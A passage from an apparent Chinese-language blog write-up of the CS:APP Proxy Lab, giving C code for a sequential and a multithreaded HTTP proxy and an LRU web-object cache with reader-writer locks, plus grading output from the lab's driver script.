    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);

/*
 * Sequential proxy entry point.  Usage: <prog> <port>.
 * Same accept loop as Tiny, with SIGPIPE ignored so that a write to a
 * closed connection reports an error instead of killing the process.
 */
int main(int argc, char** argv)
{
    int listenfd, connfd; 
    pthread_t tid; /* NOTE(review): not used in this sequential version */
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    signal(SIGPIPE, SIG_IGN); /* Added: ignore SIGPIPE */

    listenfd = Open_listenfd(argv[1]);
    /* Listening descriptor ready to receive connection requests on port argv[1]. */
    while (1) {
        printf("listening..\n");
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);
        /* Wait for a connection request on listenfd; the client's socket
           address is stored in clientaddr and connfd is the connected
           descriptor. */

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        /* Look up the client's host and service strings. */
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        /* Report who connected. */
        doit(connfd);
        /* Handle one proxied request. */
        Close(connfd);
    }
}

/*
 * Handles one proxied HTTP request arriving on client_fd.
 *
 * Reads the request line, accepts only GET, splits the URI into host,
 * port and path, connects to that server, forwards a rebuilt HTTP/1.0
 * request and relays the server's response back to the client.
 *
 * Fixes relative to the original listing:
 *  - build_requesthdrs() is defined with four parameters but was called
 *    with three; the port string is now passed.
 *  - the server descriptor is closed when the relay is finished.
 *  - a request line with fewer than two fields is answered with 400
 *    instead of using uninitialised buffers.
 *  - port_str and newreq are filled with bounded snprintf calls.
 */
void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    /* Associate client_fd with the read buffer from_client. */
    Rio_readinitb(&from_client, client_fd);
    /* Read the request line; a zero result means there was nothing to read. */
    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    if (sscanf(buf, "%s %s %s", method, uri, version) < 2) {
        clienterror(client_fd, buf, "400", "Bad Request",
            "Proxy Server could not parse the request line");
        return;
    }
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }
    /* Changed from Tiny: split the URI into host name, path and port. */
    parse_uri(uri, hostname, path, &port);

    /*------------------------------------------------------------*/
    /* From here on the code differs completely from Tiny.        */
    /*------------------------------------------------------------*/

    char port_str[16];
    snprintf(port_str, sizeof port_str, "%d", port);
    /* Act as a client towards the end server. */
    endserver_fd = Open_clientfd(hostname, port_str);
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }

    /* Associate endserver_fd with the read buffer to_endserver. */
    Rio_readinitb(&to_endserver, endserver_fd);
    char newreq[MAXLINE];
    snprintf(newreq, sizeof newreq, "GET %s HTTP/1.0\r\n", path);
    /* Added: append the forwarded and fixed headers to the request. */
    build_requesthdrs(&from_client, newreq, hostname, port_str);
    Rio_writen(endserver_fd, newreq, strlen(newreq));

    /* Relay the response to the client, logging each chunk's size. */
    int n;
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE)) > 0) {
        printf("proxy received %d bytes,then send\n", n);
        Rio_writen(client_fd, buf, n);
    }
    Close(endserver_fd);
}

/*
 * Sends an HTTP error response to the client on fd.
 *
 * cause:    item the error refers to, shown in the body.
 * errnum:   status code text, e.g. "501".
 * shortmsg: reason phrase for the status line.
 * longmsg:  longer explanation shown in the body.
 *
 * The body is built with a single bounded snprintf.  The original grew it
 * with sprintf(body, "%s...", body), where source and destination overlap,
 * which is undefined behaviour.  The bytes sent are unchanged.
 */
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    /* HTML body */
    snprintf(body, sizeof body,
        "<html><title>Proxy Error</title>"
        "<body bgcolor=""ffffff"">\r\n"
        "%s: %s\r\n"
        "<p>%s: %s\r\n"
        "<hr><em>The Proxy Web server</em>\r\n",
        errnum, shortmsg, longmsg, cause);

    /* Status line and headers, then the body */
    snprintf(buf, sizeof buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

下面编写两个改动&新增的函数：（这两个函数需要按照 “实验要求” 进行编写）

实验要求消息请求行&消息请求头为：

GET /hub/index.html HTTP/1.0
Host: www.cmu.edu
Connection: close
Proxy-Connection: close

而我们在 Proxy 写入的指令为：（其中“GET”和“HTTP/1.0”已经被处理）

1	GET http://www.cmu.edu/hub/index.html HTTP/1.0

所以这两个函数的作用，就是把 uri（统一资源标识符）转化为请求：

/*
 * Splits an absolute request URI such as
 *   http://www.cmu.edu:8080/hub/index.html
 * into its parts.
 *
 * uri:      URI to parse; it is not modified.
 * hostname: receives the host ("www.cmu.edu"); assumed to hold MAXLINE
 *           bytes, as the callers in this file provide.
 * path:     receives the path ("/hub/index.html"), or "/" when the URI
 *           has none; assumed to hold MAXLINE bytes.
 * port:     receives the port, 80 when absent or not a valid port number.
 *
 * Fixes relative to the original listing: both outputs are always
 * NUL-terminated (strncpy does not guarantee that), a ':' that occurs in
 * the path is no longer mistaken for the port separator, and `path` is
 * always assigned (it was left untouched for "host:port" and empty for
 * "host").
 */
void parse_uri(char *uri,char *hostname,char *path,int *port) {
    const char *host;
    const char *rest;
    size_t host_len;

    *port = 80;

    /* Skip the scheme ("http://") if there is one. */
    host = strstr(uri, "//");
    host = (host != NULL) ? host + 2 : uri;

    /* The host ends at the first ':' or '/', or at the end of the URI. */
    host_len = strcspn(host, ":/");
    rest = host + host_len;
    if (host_len >= MAXLINE)
        host_len = MAXLINE - 1;
    memcpy(hostname, host, host_len);
    hostname[host_len] = '\0';

    /* Optional ":port" */
    if (*rest == ':') {
        char *end;
        long value = strtol(rest + 1, &end, 10);
        if (end != rest + 1 && value > 0 && value <= 65535)
            *port = (int)value;
        rest = end;
    }

    /* Whatever starts with '/' is the path; otherwise request the root. */
    if (*rest == '/')
        snprintf(path, MAXLINE, "%s", rest);
    else
        strcpy(path, "/");
}

/* Appends src to the NUL-terminated string in dst, which holds cap bytes,
   truncating rather than writing past the end. */
static void append_str(char *dst, size_t cap, const char *src)
{
    size_t used = strlen(dst);

    if (used + 1 < cap)
        snprintf(dst + used, cap - used, "%s", src);
}

/*
 * Completes the request that is forwarded to the end server.
 *
 * rp:       buffered reader positioned after the client's request line.
 * newreq:   in/out; already holds the rewritten request line.  It is
 *           treated as a MAXLINE-byte buffer, which is what doit() passes.
 * hostname: host part of the requested URI.
 * port:     port as a string.
 *
 * The client's headers are copied up to the blank line, except Host,
 * User-Agent, Connection and Proxy-Connection, which are replaced by the
 * proxy's own versions; a final blank line ends the request.
 *
 * Fixes relative to the original listing: it appended with
 * sprintf(newreq, "%s...", newreq, ...), where source and destination
 * overlap (undefined behaviour) and nothing bounds the growth; appends
 * are now bounded.  Header names are matched at the start of the line and
 * without regard to case, instead of as a substring anywhere in the line.
 */
void build_requesthdrs(rio_t *rp, char *newreq, char *hostname, char* port) {
    char buf[MAXLINE];
    char host_hdr[MAXLINE];

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        if (!strcmp(buf, "\r\n")) break;
        if (!strncasecmp(buf, "Host:", 5)) continue;
        if (!strncasecmp(buf, "User-Agent:", 11)) continue;
        if (!strncasecmp(buf, "Connection:", 11)) continue;
        if (!strncasecmp(buf, "Proxy-Connection:", 17)) continue;

        append_str(newreq, MAXLINE, buf);
    }

    snprintf(host_hdr, sizeof host_hdr, "Host: %s:%s\r\n", hostname, port);
    append_str(newreq, MAXLINE, host_hdr);
    append_str(newreq, MAXLINE, user_agent_hdr);
    append_str(newreq, MAXLINE, conn_hdr);
    append_str(newreq, MAXLINE, prox_hdr);
    append_str(newreq, MAXLINE, "\r\n");
}

整体逻辑：

代理的前半部分和服务器如出一辙，先作为服务器链接用户端，然后调用 doit 启动自身服务，在 doit 中为“用户端的描述符”绑定内存空间，并把用户端信息复制到该空间，接着输入指令装入其中，并调用 parse_uri 进行解析
代理的后半部分又将作为客户端与目标服务器进行通信，先连接服务器并生成描述符，接着用类似的操作为“服务端的描述符”绑定内存空间，然后调用 build_requesthdrs 生成对应的服务请求，最后发送服务请求并打印数据

打分：

➜  [/home/ywhkkx/proxylab-handout] ./driver.sh 
*** Basic ***
Starting tiny on 4113
Starting proxy on 21528
1: home.html
   Fetching ./tiny/home.html into ./.proxy using the proxy
   Fetching ./tiny/home.html into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
2: csapp.c
   Fetching ./tiny/csapp.c into ./.proxy using the proxy
   Fetching ./tiny/csapp.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
3: tiny.c
   Fetching ./tiny/tiny.c into ./.proxy using the proxy
   Fetching ./tiny/tiny.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
4: godzilla.jpg
   Fetching ./tiny/godzilla.jpg into ./.proxy using the proxy
   Fetching ./tiny/godzilla.jpg into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
5: tiny
   Fetching ./tiny/tiny into ./.proxy using the proxy
   Fetching ./tiny/tiny into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
Killing tiny and proxy
basicScore: 40/40

实验二：实现多线程web代理

整体变化不大，直接挂代码了：（我会标记改动的地方）

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
/* Fixed header lines that build_requesthdrs appends to every forwarded request. */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";


/* NOTE(review): doit() calls build_requesthdrs(), which has no prototype here. */
void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);


/*
 * Multithreaded proxy entry point.  Usage: <prog> <port>.
 * Accepts connections in a loop and hands each one to a new thread
 * running thread().
 */
int main(int argc, char** argv)
{
    int listenfd, * connfd; /* Changed: connfd is now a pointer */
    pthread_t tid;
    char hostname[MAXLINE], port[MAXLINE];
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }
    signal(SIGPIPE, SIG_IGN);

    listenfd = Open_listenfd(argv[1]);
    while (1) {
        printf("listening..\n");
        clientlen = sizeof(clientaddr);
        connfd = Malloc(sizeof(int));
        /* Changed: each connection's descriptor gets its own heap cell.
           The pointer is handed to the new thread, which frees it; a
           single variable in main would be reused by the next Accept. */
        *connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE,
            port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);
        Pthread_create(&tid, NULL, thread, connfd);
        /* Added: start a thread that runs thread() with connfd as its argument. */
    }
}

/*
 * Per-connection thread routine.
 *
 * vargp: pointer to a heap-allocated int holding the connected
 *        descriptor.  The value is copied out and the cell is freed here.
 *
 * The thread detaches itself, serves the connection with doit(), closes
 * the descriptor and returns NULL.
 */
void* thread(void* vargp)
{
    int* slot = vargp;
    int connfd = *slot;

    /* Detach so that nobody has to join this thread. */
    Pthread_detach(pthread_self());
    /* The descriptor has been copied, so the cell can be released. */
    Free(slot);

    doit(connfd);
    Close(connfd);
    return NULL;
}

/*
 * Handles one proxied HTTP request arriving on client_fd.
 *
 * Reads the request line, accepts only GET, splits the URI into host,
 * port and path, connects to that server, forwards a rebuilt HTTP/1.0
 * request and relays the server's response back to the client.
 *
 * Fixes relative to the original listing:
 *  - build_requesthdrs() is defined with four parameters but was called
 *    with three; the port string is now passed.
 *  - the server descriptor is closed when the relay is finished, which
 *    matters here because the process keeps serving other connections.
 *  - a request line with fewer than two fields is answered with 400
 *    instead of using uninitialised buffers.
 *  - port_str and newreq are filled with bounded snprintf calls.
 */
void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    Rio_readinitb(&from_client, client_fd);

    /* Read the request line; a zero result means there was nothing to read. */
    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    if (sscanf(buf, "%s %s %s", method, uri, version) < 2) {
        clienterror(client_fd, buf, "400", "Bad Request",
            "Proxy Server could not parse the request line");
        return;
    }
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }

    parse_uri(uri, hostname, path, &port);
    char port_str[16];
    snprintf(port_str, sizeof port_str, "%d", port);
    /* Act as a client towards the end server. */
    endserver_fd = Open_clientfd(hostname, port_str);
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }
    Rio_readinitb(&to_endserver, endserver_fd);

    char newreq[MAXLINE];
    snprintf(newreq, sizeof newreq, "GET %s HTTP/1.0\r\n", path);
    build_requesthdrs(&from_client, newreq, hostname, port_str);

    Rio_writen(endserver_fd, newreq, strlen(newreq));
    /* Relay the response to the client, logging each chunk's size. */
    int n;
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE)) > 0) {
        printf("proxy received %d bytes,then send\n", n);
        Rio_writen(client_fd, buf, n);
    }
    Close(endserver_fd);
}

/*
 * Sends an HTTP error response to the client on fd.
 *
 * cause:    item the error refers to, shown in the body.
 * errnum:   status code text, e.g. "501".
 * shortmsg: reason phrase for the status line.
 * longmsg:  longer explanation shown in the body.
 *
 * The body is built with a single bounded snprintf.  The original grew it
 * with sprintf(body, "%s...", body), where source and destination overlap,
 * which is undefined behaviour.  The bytes sent are unchanged.
 */
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    /* HTML body */
    snprintf(body, sizeof body,
        "<html><title>Proxy Error</title>"
        "<body bgcolor=""ffffff"">\r\n"
        "%s: %s\r\n"
        "<p>%s: %s\r\n"
        "<hr><em>The Proxy Web server</em>\r\n",
        errnum, shortmsg, longmsg, cause);

    /* Status line and headers, then the body */
    snprintf(buf, sizeof buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

/*
 * parse_uri - split "[scheme://]host[:port][/path]" into its parts.
 *
 * uri       NUL-terminated request URI; it is only read, never modified
 * hostname  out: host part; needs room for strlen(uri) + 2 bytes
 * path      out: path starting at the first '/', or "/" when the URI has none;
 *           needs room for strlen(uri) + 2 bytes
 * port      out: port after "host:", or 80 when absent or not numeric
 *
 * A ':' counts as a port separator only when it appears before the first '/'
 * of the authority, so a colon inside the path no longer corrupts the host.
 * path is always written, including for "host:port" with no path.
 */
void parse_uri(char* uri, char* hostname, char* path, int* port) {
    const char* host;
    const char* rest;
    const char* colon;
    size_t auth_len, host_len;

    *port = 80;

    /* Skip everything up to and including "//" when a scheme is present. */
    host = strstr(uri, "//");
    host = (host != NULL) ? host + 2 : uri;

    /* The authority ("host[:port]") ends at the first '/' or at the end. */
    auth_len = strcspn(host, "/");
    rest = host + auth_len;

    colon = memchr(host, ':', auth_len);
    host_len = (colon != NULL) ? (size_t)(colon - host) : auth_len;

    memcpy(hostname, host, host_len);
    hostname[host_len] = '\0';

    /* On a non-numeric port sscanf assigns nothing and the default stays. */
    if (colon != NULL)
        sscanf(colon + 1, "%d", port);

    strcpy(path, (*rest != '\0') ? rest : "/");
}

/*
 * build_requesthdrs - append the forwarded request headers to newreq.
 *
 * rp        buffered reader positioned just after the client's request line
 * newreq    in/out: already holds the request line; assumed to have room for
 *           MAXLINE bytes (doit passes a char[MAXLINE])
 * hostname  origin host for the Host header
 * port      origin port (text) for the Host header
 *
 * Client headers are forwarded except Host, User-Agent, Connection and
 * Proxy-Connection, which are replaced by the proxy's own values. Appends are
 * done at a tracked offset with explicit bounds: the old
 * sprintf(newreq, "%s...", newreq) calls overlapped source and destination
 * and could overflow newreq. A client header that would leave no room for the
 * mandatory trailer is dropped.
 */
void build_requesthdrs(rio_t* rp, char* newreq, char* hostname, char* port) {
    char buf[MAXLINE];
    char tail[MAXLINE];
    size_t used = strlen(newreq);
    size_t tail_len;
    int rc;

    /* Build the mandatory trailer first so its space can be reserved. */
    rc = snprintf(tail, sizeof tail, "Host: %s:%s\r\n%s%s%s\r\n",
        hostname, port, user_agent_hdr, conn_hdr, prox_hdr);
    if (rc < 0)
        tail_len = 0;
    else if ((size_t)rc >= sizeof tail)
        tail_len = sizeof tail - 1;
    else
        tail_len = (size_t)rc;

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        if (!strcmp(buf, "\r\n")) break;
        if (strstr(buf, "Host:") != NULL) continue;
        if (strstr(buf, "User-Agent:") != NULL) continue;
        if (strstr(buf, "Connection:") != NULL) continue;
        if (strstr(buf, "Proxy-Connection:") != NULL) continue;

        size_t n = strlen(buf);
        if (used + n + tail_len < MAXLINE) {
            memcpy(newreq + used, buf, n);
            used += n;
            newreq[used] = '\0';
        }
    }

    if (used < MAXLINE)
        snprintf(newreq + used, MAXLINE - used, "%s", tail);
}

打分：

*** Concurrency ***
Starting tiny on port 11348
Starting proxy on port 8656
Starting the blocking NOP server on port 8806
Trying to fetch a file from the blocking nop-server
Fetching ./tiny/home.html into ./.noproxy directly from Tiny
Fetching ./tiny/home.html into ./.proxy using the proxy
Checking whether the proxy fetch succeeded
Success: Was able to fetch tiny/home.html from the proxy.
Killing tiny, proxy, and nop-server
concurrencyScore: 15/15

实验三：缓存web对象

要求实现缓存客户端的请求

其中最大的缓存块大小要小于 MAX_OBJECT_SIZE（102400）
总的缓存大小 MAX_CACHE_SIZE（1049000）
cache需要牺牲缓存块时，运用LRU算法
在实现过程中需要解决不同线程同时访问cache的问题

定义cache结构体

/* Number of size classes; each class has its own array of blocks. */
#define TYPES 6
/* Per-class block capacity in bytes and per-class block count. */
extern const int cache_block_size[];
extern const int cache_cnt[];

/* One cached web object together with its lock. */
typedef struct cache_block{
    char* url;				/* key: request URL that identifies the cached object */
    char* data;				/* cached response bytes */
    int datasize;			/* number of valid bytes in data */
    int64_t time;			/* timestamp (ms) set on read/write; 0 marks an unused block */
    pthread_rwlock_t rwlock; /* reader/writer lock for this block */
} cache_block;

/* One size class: an array of equally sized blocks. */
typedef struct cache_type{
    cache_block *cacheobjs; /* array of blocks allocated by init_cache */
    int size;               /* number of blocks in cacheobjs */
} cache_type;

/* The cache itself: one entry per size class. */
cache_type caches[TYPES];

LRU(基于系统时间)+隐式+暴力获取(直接遍历所有cache)

/* Block capacity (bytes) per size class, and how many blocks each class has.
 * Sum of size * count is 1,048,560 bytes. */
const int cache_block_size[] = {102, 1024, 5120 ,10240,25600, 102400};
const int cache_cnt[] = {40,20,20,10,12,5};
/* Wall-clock time in milliseconds; used as the LRU timestamp. */
int64_t currentTimeMillis();

/* cache初始化 */
void init_cache()
{
    int i = 0;
    for (; i < TYPES; i++) {
        /* 不同组的cache大小不同,组数也不同 */
        caches[i].size = cache_cnt[i];
        caches[i].cacheobjs 
              = (cache_block *)malloc(cache_cnt[i] * sizeof(cache_block));
        cache_block *j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            /* 把组中每一个元素的各个区域进行操作(重置为"0"或申请存储区) */
            j->time = 0;
            j->datasize = 0;
            j->url = malloc(sizeof(char) * MAXLINE);
            strcpy(j->url,"");
            j->data = malloc(sizeof(char) * cache_block_size[i]);
            memset(j->data,0,cache_block_size[i]);
            pthread_rwlock_init(&j->rwlock,NULL);
            /* 初始化一个读写锁 */
        }
    }
}

/*
 * free_cache - release everything init_cache set up: per-block url and data
 * buffers, the per-block rwlock, and finally each class's block array.
 */
void free_cache() {
    for (int cls = 0; cls < TYPES; cls++) {
        cache_block *blocks = caches[cls].cacheobjs;

        for (int n = 0; n < cache_cnt[cls]; n++) {
            cache_block *blk = &blocks[n];

            free(blk->url);
            free(blk->data);
            pthread_rwlock_destroy(&blk->rwlock);
        }
        free(blocks);
    }
}

/*
 * read_cache - serve url from the cache if present.
 *
 * url  lookup key
 * fd   descriptor the cached bytes are written to on a hit
 *
 * Returns 1 when a cached object was sent, 0 on a miss.
 *
 * The match test and the send happen under the same read lock. The previous
 * version validated the URL, dropped the lock and re-acquired it before
 * sending, so a concurrent write_cache could replace the block in between and
 * another URL's data would be served. The scan itself used to read url/time
 * without any lock.
 */
int read_cache(char *url,int fd){
    printf("read cache %s \n", url);

    for (int tar = 0; tar < TYPES; tar++) {
        cache_block *p = caches[tar].cacheobjs;

        for (int i = 0; i < caches[tar].size; i++, p++) {
            int hit;

            pthread_rwlock_rdlock(&p->rwlock);
            hit = (p->time != 0 && strcmp(url, p->url) == 0);
            if (hit)
                Rio_writen(fd, p->data, p->datasize);
            pthread_rwlock_unlock(&p->rwlock);

            if (!hit)
                continue;

            /* Best-effort LRU refresh: skipped when the lock is busy, and
             * re-checked because the block may have been replaced since. */
            if (!pthread_rwlock_trywrlock(&p->rwlock)) {
                if (p->time != 0 && strcmp(url, p->url) == 0)
                    p->time = currentTimeMillis();
                pthread_rwlock_unlock(&p->rwlock);
            }
            printf("read cache successful\n");
            return 1;
        }
    }

    printf("read cache fail\n");
    return 0;
}

/*
 * write_cache - store an object in the smallest size class that fits it.
 *
 * url   key to store (NUL-terminated; truncated to MAXLINE - 1 bytes)
 * data  object bytes
 * len   number of bytes in data
 *
 * An unused block (time == 0) is preferred; otherwise the block with the
 * oldest timestamp in that class is overwritten (LRU).
 *
 * Fixes over the previous version:
 *  - objects larger than the biggest class (or a negative len) are ignored
 *    instead of indexing caches[TYPES];
 *  - the victim pointer always refers to a real block, even if every
 *    timestamp is newer than "now";
 *  - the URL is copied as a string rather than with memcpy(.., MAXLINE),
 *    which read past the end of shorter source strings;
 *  - timestamps are read under the block's read lock.
 */
void write_cache(char *url, char *data, int len){
    int tar = 0;
    for (; tar < TYPES && len > cache_block_size[tar]; tar++) ;
    printf("write cache %s %d\n", url, tar);
    if (len < 0 || tar == TYPES)
        return;

    cache_block *blocks = caches[tar].cacheobjs;
    cache_block *victim = NULL;
    int64_t oldest = 0;

    for (int i = 0; i < caches[tar].size; i++) {
        int64_t stamp;

        pthread_rwlock_rdlock(&blocks[i].rwlock);
        stamp = blocks[i].time;
        pthread_rwlock_unlock(&blocks[i].rwlock);

        if (stamp == 0) {           /* unused block: take it */
            victim = &blocks[i];
            break;
        }
        if (victim == NULL || stamp < oldest) {
            oldest = stamp;
            victim = &blocks[i];
        }
    }
    if (victim == NULL)             /* class has no blocks */
        return;

    pthread_rwlock_wrlock(&victim->rwlock);
    victim->time = currentTimeMillis();
    victim->datasize = len;
    snprintf(victim->url, MAXLINE, "%s", url);
    memcpy(victim->data, data, len);
    pthread_rwlock_unlock(&victim->rwlock);
    printf("write Cache\n");
}

/*
 * currentTimeMillis - wall-clock time from gettimeofday, in milliseconds.
 */
int64_t currentTimeMillis() {
  struct timeval now;

  gettimeofday(&now, NULL);
  /* whole seconds scaled to ms, plus the microsecond part truncated to ms */
  return (int64_t)(now.tv_sec) * 1000 + (now.tv_usec / 1000);
}

关于锁我没有深入学习，这里挂个博客：读写锁函数说明

最后需要把这些函数插入到原来的代码中：

#include <stdio.h>
#include "csapp.h"
/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char* conn_hdr = "Connection: close\r\n";
static const char* prox_hdr = "Proxy-Connection: close\r\n";

/* Number of size classes; each class has its own array of blocks. */
#define TYPES 6
/* Per-class block capacity in bytes and per-class block count. */
extern const int cache_block_size[];
extern const int cache_cnt[];

/* One cached web object together with its lock. */
typedef struct cache_block {
    char* url;               /* key: request URL that identifies the cached object */
    char* data;              /* cached response bytes */
    int datasize;            /* number of valid bytes in data */
    int64_t time;            /* timestamp (ms) set on read/write; 0 marks an unused block */
    pthread_rwlock_t rwlock; /* reader/writer lock for this block */
} cache_block;

/* One size class: an array of equally sized blocks. */
typedef struct cache_type {
    cache_block* cacheobjs; /* array of blocks allocated by init_cache */
    int size;               /* number of blocks in cacheobjs */
} cache_type;

/* The cache itself: one entry per size class. */
cache_type caches[TYPES];


void doit(int fd);
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg);
void parse_uri(char* uri, char* hostname, char* path, int* port);
void* thread(void* vargp);
void init_cache();
int read_cache(char* url, int fd);
void write_cache(char* url, char* data, int len);
void free_cache();

/* Block capacity (bytes) per size class, and how many blocks each class has.
 * Sum of size * count is 1,048,560 bytes, which stays below MAX_CACHE_SIZE. */
const int cache_block_size[] = { 102, 1024, 5120 ,10240,25600, 102400 };
const int cache_cnt[] = { 40,20,20,10,12,5 };
/* Wall-clock time in milliseconds; used as the LRU timestamp. */
int64_t currentTimeMillis();

void init_cache()
{
    int i = 0;
    for (; i < TYPES; i++) {
        caches[i].size = cache_cnt[i];
        caches[i].cacheobjs
            = (cache_block*)malloc(cache_cnt[i] * sizeof(cache_block));
        cache_block* j = caches[i].cacheobjs;
        int k;
        for (k = 0; k < cache_cnt[i]; j++, k++) {
            j->time = 0;
            j->datasize = 0;
            j->url = malloc(sizeof(char) * MAXLINE);
            strcpy(j->url, "");
            j->data = malloc(sizeof(char) * cache_block_size[i]);
            memset(j->data, 0, cache_block_size[i]);
            pthread_rwlock_init(&j->rwlock, NULL);
        }
    }
}

/*
 * free_cache - release everything init_cache set up: per-block url and data
 * buffers, the per-block rwlock, and finally each class's block array.
 */
void free_cache() {
    for (int cls = 0; cls < TYPES; cls++) {
        cache_block* blocks = caches[cls].cacheobjs;

        for (int n = 0; n < cache_cnt[cls]; n++) {
            cache_block* blk = &blocks[n];

            free(blk->url);
            free(blk->data);
            pthread_rwlock_destroy(&blk->rwlock);
        }
        free(blocks);
    }
}

/*
 * read_cache - serve url from the cache if present.
 *
 * url  lookup key
 * fd   descriptor the cached bytes are written to on a hit
 *
 * Returns 1 when a cached object was sent, 0 on a miss.
 *
 * The match test and the send happen under the same read lock. The previous
 * version validated the URL, dropped the lock and re-acquired it before
 * sending, so a concurrent write_cache could replace the block in between and
 * another URL's data would be served. The scan itself used to read url/time
 * without any lock.
 */
int read_cache(char* url, int fd) {
    printf("read cache %s \n", url);

    for (int tar = 0; tar < TYPES; tar++) {
        cache_block* p = caches[tar].cacheobjs;

        for (int i = 0; i < caches[tar].size; i++, p++) {
            int hit;

            pthread_rwlock_rdlock(&p->rwlock);
            hit = (p->time != 0 && strcmp(url, p->url) == 0);
            if (hit)
                Rio_writen(fd, p->data, p->datasize);
            pthread_rwlock_unlock(&p->rwlock);

            if (!hit)
                continue;

            /* Best-effort LRU refresh: skipped when the lock is busy, and
             * re-checked because the block may have been replaced since. */
            if (!pthread_rwlock_trywrlock(&p->rwlock)) {
                if (p->time != 0 && strcmp(url, p->url) == 0)
                    p->time = currentTimeMillis();
                pthread_rwlock_unlock(&p->rwlock);
            }
            printf("read cache successful\n");
            return 1;
        }
    }

    printf("read cache fail\n");
    return 0;
}

/*
 * write_cache - store an object in the smallest size class that fits it.
 *
 * url   key to store (NUL-terminated; truncated to MAXLINE - 1 bytes)
 * data  object bytes
 * len   number of bytes in data
 *
 * An unused block (time == 0) is preferred; otherwise the block with the
 * oldest timestamp in that class is overwritten (LRU).
 *
 * Fixes over the previous version:
 *  - objects larger than the biggest class (or a negative len) are ignored
 *    instead of indexing caches[TYPES];
 *  - the victim pointer always refers to a real block, even if every
 *    timestamp is newer than "now";
 *  - the URL is copied as a string rather than with memcpy(.., MAXLINE),
 *    which read past the end of shorter source strings;
 *  - timestamps are read under the block's read lock.
 */
void write_cache(char* url, char* data, int len) {
    int tar = 0;
    for (; tar < TYPES && len > cache_block_size[tar]; tar++);
    printf("write cache %s %d\n", url, tar);
    if (len < 0 || tar == TYPES)
        return;

    cache_block* blocks = caches[tar].cacheobjs;
    cache_block* victim = NULL;
    int64_t oldest = 0;

    for (int i = 0; i < caches[tar].size; i++) {
        int64_t stamp;

        pthread_rwlock_rdlock(&blocks[i].rwlock);
        stamp = blocks[i].time;
        pthread_rwlock_unlock(&blocks[i].rwlock);

        if (stamp == 0) {           /* unused block: take it */
            victim = &blocks[i];
            break;
        }
        if (victim == NULL || stamp < oldest) {
            oldest = stamp;
            victim = &blocks[i];
        }
    }
    if (victim == NULL)             /* class has no blocks */
        return;

    pthread_rwlock_wrlock(&victim->rwlock);
